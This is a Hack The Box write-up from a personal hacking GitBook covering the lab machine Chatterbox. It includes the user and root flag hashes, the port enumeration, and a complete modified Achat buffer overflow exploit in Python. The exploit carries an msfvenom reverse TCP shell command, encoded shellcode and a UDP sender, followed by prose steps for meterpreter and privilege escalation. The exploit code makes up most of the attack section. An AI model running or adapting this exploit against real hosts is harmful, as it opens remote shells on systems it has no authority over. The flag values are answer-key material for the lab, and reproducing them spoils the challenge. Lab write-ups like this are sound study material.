Hacking
GithubTwitter
Search…
Hacking
Hacking, Bug Bounties & Penetration Testing
The Hacker Lab
Methodologies
Basic Buffer Overflow
Basic Internal Network test
Basic Mobile Testing guide
Basic Subdomain Enumeration guide
Guides
Build A Raspberry Pi Dropbox
Hack The Box last updated - 2019
Legacy
Devel
Optimum
Popcorn
Beep
Tenten
Arctic
Cronos
Grandpa
Granny
October
Lazy
Sneaky
Holiday
Blocky
Shrek
Blue
Joker
Europa
Haircut
Bank
SolidState
Mantis
Shocker
Tally
Sense
Jeeves
Stratosphere
Inception
Bashed
Fluxcapacitor
Canape
Rabbit
Chatterbox
Nibbles
Sunday
Aragog
Valentine
Silo
Olympus
Poison
Celestial
Waldo
Jerry
Access
Active
Netmon
Powered By GitBook
Chatterbox

Chatterbox - 10.10.10.74

Target Enumeration:

OS: Windows
IP: 10.10.10.74
User: 72290246dfaedb1e3e3ac9d6fb306334
Root: a673d1b1fa95c276c5ef2aa13d9dcc7c

Ports / Services / Software Versions Running

9255/tcp open mon
9256/tcp open -

Vulnerability Exploited:

Achat Remote Buffer Overflow.
https://www.exploit-db.com/exploits/36025/

Privilege Escalation:

Icacls on root.txt allows current user to read any file owned by the administrator.

Exploiting the host:

Nmap took too long so I used Sparta on this one:
Revealed port 9255 & 9256 open.
Googling the port gave us Achat
That is a really buggy metasploit exploit so we found a better one online:
https://www.exploit-db.com/exploits/36025/
Generate your shellcode
Paste that into the script so it looks as follows:
1
#!/usr/bin/python
2
# Author KAhara MAnhara - modified
3
# Achat 0.150 beta7 - Buffer Overflow
4
# Tested on Windows 7 32bit
5
​
6
import socket
7
import sys, time
8
​
9
# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
10
#Payload size: 512 bytes
11
​
12
buf = ""
13
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
14
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
15
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
16
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
17
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
18
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
19
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
20
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
21
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
22
buf += "\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x47\x78\x53\x52"
23
buf += "\x4d\x30\x4d\x30\x59\x70\x43\x30\x45\x39\x6b\x35\x6e"
24
buf += "\x51\x55\x70\x71\x54\x72\x6b\x72\x30\x6c\x70\x54\x4b"
25
buf += "\x4f\x62\x7a\x6c\x72\x6b\x42\x32\x6e\x34\x44\x4b\x30"
26
buf += "\x72\x6b\x78\x6a\x6f\x37\x47\x6d\x7a\x4f\x36\x30\x31"
27
buf += "\x69\x6f\x66\x4c\x6f\x4c\x51\x51\x51\x6c\x59\x72\x4e"
28
buf += "\x4c\x6b\x70\x79\x31\x46\x6f\x4c\x4d\x49\x71\x57\x57"
29
buf += "\x79\x52\x39\x62\x4e\x72\x32\x37\x52\x6b\x30\x52\x4a"
30
buf += "\x70\x32\x6b\x4e\x6a\x4f\x4c\x72\x6b\x4e\x6c\x4b\x61"
31
buf += "\x71\x68\x69\x53\x6e\x68\x79\x71\x68\x51\x32\x31\x62"
32
buf += "\x6b\x50\x59\x6b\x70\x59\x71\x46\x73\x74\x4b\x61\x39"
33
buf += "\x7a\x78\x5a\x43\x6e\x5a\x6d\x79\x34\x4b\x30\x34\x74"
34
buf += "\x4b\x49\x71\x57\x66\x30\x31\x49\x6f\x74\x6c\x56\x61"
35
buf += "\x46\x6f\x6c\x4d\x59\x71\x69\x37\x4e\x58\x67\x70\x70"
36
buf += "\x75\x69\x66\x49\x73\x53\x4d\x39\x68\x4f\x4b\x71\x6d"
37
buf += "\x6b\x74\x73\x45\x37\x74\x51\x48\x54\x4b\x6f\x68\x6f"
38
buf += "\x34\x79\x71\x5a\x33\x32\x46\x44\x4b\x6a\x6c\x30\x4b"
39
buf += "\x52\x6b\x71\x48\x6d\x4c\x39\x71\x56\x73\x72\x6b\x6c"
40
buf += "\x44\x32\x6b\x6d\x31\x48\x50\x31\x79\x4d\x74\x6f\x34"
41
buf += "\x6e\x44\x4f\x6b\x31\x4b\x70\x61\x31\x49\x71\x4a\x52"
42
buf += "\x31\x6b\x4f\x47\x70\x51\x4f\x71\x4f\x70\x5a\x34\x4b"
43
buf += "\x4c\x52\x58\x6b\x72\x6d\x4f\x6d\x4f\x78\x30\x33\x50"
44
buf += "\x32\x79\x70\x69\x70\x53\x38\x52\x57\x73\x43\x50\x32"
45
buf += "\x31\x4f\x61\x44\x32\x48\x50\x4c\x30\x77\x4f\x36\x7a"
46
buf += "\x67\x6b\x4f\x36\x75\x36\x58\x62\x70\x49\x71\x59\x70"
47
buf += "\x49\x70\x6f\x39\x35\x74\x6f\x64\x32\x30\x43\x38\x4b"
48
buf += "\x79\x63\x50\x30\x6b\x4b\x50\x79\x6f\x48\x55\x42\x30"
49
buf += "\x70\x50\x42\x30\x42\x30\x51\x30\x62\x30\x61\x30\x6e"
50
buf += "\x70\x63\x38\x39\x5a\x7a\x6f\x79\x4f\x49\x50\x69\x6f"
51
buf += "\x78\x55\x45\x47\x32\x4a\x69\x75\x31\x58\x49\x7a\x4a"
52
buf += "\x6a\x6a\x6e\x6b\x58\x33\x38\x39\x72\x49\x70\x4a\x61"
53
buf += "\x65\x6b\x72\x69\x49\x56\x70\x6a\x4a\x70\x6f\x66\x51"
54
buf += "\x47\x70\x68\x44\x59\x46\x45\x53\x44\x43\x31\x59\x6f"
55
buf += "\x5a\x35\x35\x35\x59\x30\x62\x54\x6a\x6c\x49\x6f\x4e"
56
buf += "\x6e\x4c\x48\x44\x35\x78\x6c\x43\x38\x78\x70\x74\x75"
57
buf += "\x65\x52\x42\x36\x79\x6f\x79\x45\x62\x48\x30\x63\x52"
58
buf += "\x4d\x52\x44\x79\x70\x32\x69\x68\x63\x6f\x67\x4f\x67"
59
buf += "\x71\x47\x4c\x71\x7a\x56\x42\x4a\x6a\x72\x50\x59\x6e"
60
buf += "\x76\x49\x52\x4b\x4d\x42\x46\x35\x77\x31\x34\x6c\x64"
61
buf += "\x4d\x6c\x5a\x61\x6d\x31\x44\x4d\x31\x34\x4e\x44\x4a"
62
buf += "\x70\x76\x66\x6b\x50\x4e\x64\x51\x44\x30\x50\x6e\x76"
63
buf += "\x31\x46\x30\x56\x31\x36\x50\x56\x70\x4e\x50\x56\x72"
64
buf += "\x36\x71\x43\x51\x46\x42\x48\x43\x49\x68\x4c\x4f\x4f"
65
buf += "\x62\x66\x6b\x4f\x76\x75\x74\x49\x59\x50\x6e\x6e\x62"
66
buf += "\x36\x51\x36\x59\x6f\x30\x30\x33\x38\x79\x78\x53\x57"
67
buf += "\x4b\x6d\x51\x50\x4b\x4f\x78\x55\x45\x6b\x4c\x30\x76"
68
buf += "\x55\x35\x52\x70\x56\x62\x48\x63\x76\x34\x55\x77\x4d"
69
buf += "\x33\x6d\x49\x6f\x4a\x35\x4d\x6c\x4b\x56\x73\x4c\x7a"
70
buf += "\x6a\x53\x50\x39\x6b\x79\x50\x71\x65\x7a\x65\x67\x4b"
71
buf += "\x70\x47\x6d\x43\x62\x52\x32\x4f\x4f\x7a\x69\x70\x42"
72
buf += "\x33\x4b\x4f\x37\x65\x41\x41"
73
​
74
# Create a UDP socket - Change this host!!!
75
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
76
server_address = ('10.10.10.74', 9256)
77
​
78
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
79
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
80
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
81
p += "\x62" + "A"*45
82
p += "\x61\x40"
83
p += "\x2A\x46"
84
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
85
p += "\x61\x43" + "\x2A\x46"
86
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
87
p += buf + "A" * (1152 - len(buf))
88
p += "\x00" + "A"*10 + "\x00"
89
​
90
print "---->{P00F}!"
91
i=0
92
while i<len(p):
93
if i > 172000:
94
time.sleep(1.0)
95
sent = sock.sendto(p[i:(i+8192)], server_address)
96
i += sent
97
sock.close()
Copied!
Execute
Now you have a shell
Upgrade your shell to meterpreter as it is windows 7 we will use powershell to download it.
Generate a shell with msfvenom
Start your python web server and a metasploit listener
Download the file with the following commands and execute it.
Now you have a meterpreter shell
Enumerating the system show you that you can access the administrators desktop but cannot read the file.
Use the following command to assign ownership to alfred and collect the root flag.
Hack The Box last updated - 2019 - Previous
Rabbit
Next - Hack The Box last updated - 2019
Nibbles
Last modified 2yr ago
Copy link
Contents
Chatterbox - 10.10.10.74
Target Enumeration:
Ports / Services / Software Versions Running
Vulnerability Exploited:
Privilege Escalation:
Exploiting the host: